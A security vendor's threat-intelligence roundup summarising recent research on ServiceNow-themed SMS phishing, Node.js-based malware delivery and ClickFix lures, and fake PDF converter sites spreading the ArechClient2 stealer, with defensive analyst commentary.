CTI Roundup: SMS Phishing, Node.js, and Fake PDF Converters

This week, the Tanium CTI team reviews new findings from Cofense about the ongoing use of SMS-based phishing to target organizations and steal credentials. Next up, the team looks at several campaigns that leverage Node.js to deliver malware and other harmful payloads. Finally, we explore how deceptive file converters are being used to deliver malware.

Threat actors continue to exploit SMS using social engineering

Cofense reports ongoing SMS-based phishing targeting organizations to steal credentials.

In its investigation, Cofense observed an uptick in these attacks that create a false sense of urgency or fear to trick recipients into acting and falling victim.

[Read also: What is social engineering in cybersecurity? A comprehensive guide]

What do the SMS messages say?

These attacks start with an SMS message sent to an intended recipient. The messages are crafted to create a sense of urgency or fear, using phrases like “attention” and “please view changes.”

According to Cofense, the threat actor included the phrase, “if this was not you, please log in to make a ticket,” to elicit an action from the recipient.

How does the malicious site work?

If the recipient clicks on the link in the SMS message, they are redirected through Google to appear more legitimate. Once there, they must click an additional link to the final landing page.

The final landing page is a phishing page that impersonates ServiceNow’s login page and asks users to enter their credentials. If credentials are entered, the victim is shown a fake multifactor authentication (MFA) prompt, giving the actor both credentials and MFA information.

[Read also: Is multifactor authentication (MFA) living up to its hype?]

Analyst comments from Tanium’s Cyber Threat Intelligence team

This research is a reminder to be on the lookout for phishing not only in email, but in SMS messages as well.

Many signs are the same, including the false sense of urgency, the enticement to click on something, and the unexpected message. In both cases, the actor will often try to establish a sense of trust and play on human emotions.

Node.js misuse results in malware and malicious payload delivery

Microsoft has identified several campaigns that leverage Node.js to deliver malware and other malicious payloads.

Most recently, it detected a malvertising attack still in operation today that utilizes Node.js as part of a cryptocurrency trading campaign. The campaign aims to deceive users into downloading a malicious installer disguised as legitimate software.

What is Node.js?

Node.js is an open-source JavaScript runtime environment that executes JavaScript code outside a web browser. Developers often use Node.js for server-side scripting and to create scalable network applications.

Understanding malvertising

Microsoft observed in its customer environments that delivering Node.js-related malware via malvertising remains popular. These malvertisements lure victims to visit websites where they will download and install malware disguised as legitimate software.

In the cryptocurrency campaign, the ads were designed to look like they were from a legitimate trading platform, aiming to deceive victims into downloading a harmful installer. This installer, however, contained a malicious DLL intended to collect system information and maintain persistence.

[Read also: I almost fell for this online scam. Why even tech pros can be taken]

When launched, the Wix-built package installer loads a DLL that gathers information through a WMI query. It also creates a scheduled PowerShell command task to ensure persistence. The victim is also presented with a decoy window displaying the legitimate website.

How the malware evades detection

The previously mentioned scheduled task will run PowerShell commands to exclude PowerShell and the current directory from being scanned, preventing future PowerShell executions from being alerted.

How does this type of malware gather and exfiltrate data?

A PowerShell command runs to obtain and run scripts from remote URLs. These scripts will gather Windows information, BIOS information, system information, and OS data.

According to Microsoft, the data is “structured into a nested hash table, converted into JSON format, and then sent using HTTP POST to the attacker’s command-and-control (C2) server.”

An additional PowerShell script runs to download and extract an archive file from the C2. It then turns off proxy settings and launches a JavaScript file from the archive.

How is Node.js used to deliver the malware?

The Node.js executable, previously downloaded from the archive, launches the JavaScript file. This loads library modules, establishes connections, and adds certificates to the device.

Microsoft has also noticed a technique emerging from Node.js campaigns that involves inline JavaScript execution. With this technique, the malicious scripts run through Node.js to deploy malware.

Microsoft observed one instance of this in a ClickFix attack where the user is tricked into copying, pasting, and running malicious code. This code downloaded multiple components, including the Node.js binary. A script could then use the Node.js environment to execute JavaScript in the command line instead of through a file.

Analyst comments from Tanium’s Cyber Threat Intelligence team

This discovery doesn’t mean that actors have stopped using other popular scripting languages altogether—just that they are now occasionally leveraging compiled JavaScript.

Microsoft pointed out that if Node.js malware usage starts to gain popularity, this could indicate a shift in attacker preferences. This also serves as another example of how threat actors will seek out and leverage applications often used legitimately to blend in with normal activity.

As always, Microsoft has included recommendations, detections, and hunting queries to help organizations identify this threat.

Fake PDF converters help deliver malware

Following an FBI alert regarding malicious file converters that deliver malware, CloudSEK investigated the threat. Its report analyzes an attack involving a malicious document converter that poses as a trustworthy service but seeks to deliver the ArechClient2 malware.

CloudSEK identified multiple malicious file conversion websites that mimic “pdfcandy.com,” a legitimate file converter. These sites are nearly identical to the legitimate one and prompt visitors to upload a PDF file to be converted to a Word format.

How does the fake PDF converter malware work?

When a PDF is uploaded, the site first displays an animated loading sequence to trick the victim into thinking the file is being processed. Next, the site presents the victim with a CAPTCHA verification box. After completing this step, a dialog box asks the victim to copy, paste, and run code to trigger the malicious payload.

Additionally, researchers at CloudSEK decoded the command and identified a redirection chain that obscures the malware delivery process. This works in two parts:

1. The initial connection targets a URL disguised as a shortened link. This leads to a malicious URL that serves the malicious payload, “adobe.zip.”
2. The malicious payload is hosted on an IP address previously flagged as malicious. A malicious executable, “audiobit[.]exe,” contained within the zip file, will trigger an attack chain that results in the execution of the ArechClient2 information stealer.

Analyst comments from Tanium’s Cyber Threat Intelligence team

The attack relies on a significant amount of manual interaction from the victim, as it asks them to copy, paste, and run the malicious code. This technique is becoming increasingly popular, so it must have some level of success if actors continue to use it.

Educating about some of the telltale signs of this popular threat can easily be included in security awareness training for employees. CloudSEK also includes some recommendations for protection in its report that may be helpful.

[Read also: CISO success story: The best cure for boring cybersecurity training]

---

Do you have insight into these stories that you want to share? Head over to Tanium’s discussion forum to start a conversation.

For further reading, catch up on our recent cyber threat intelligence roundups.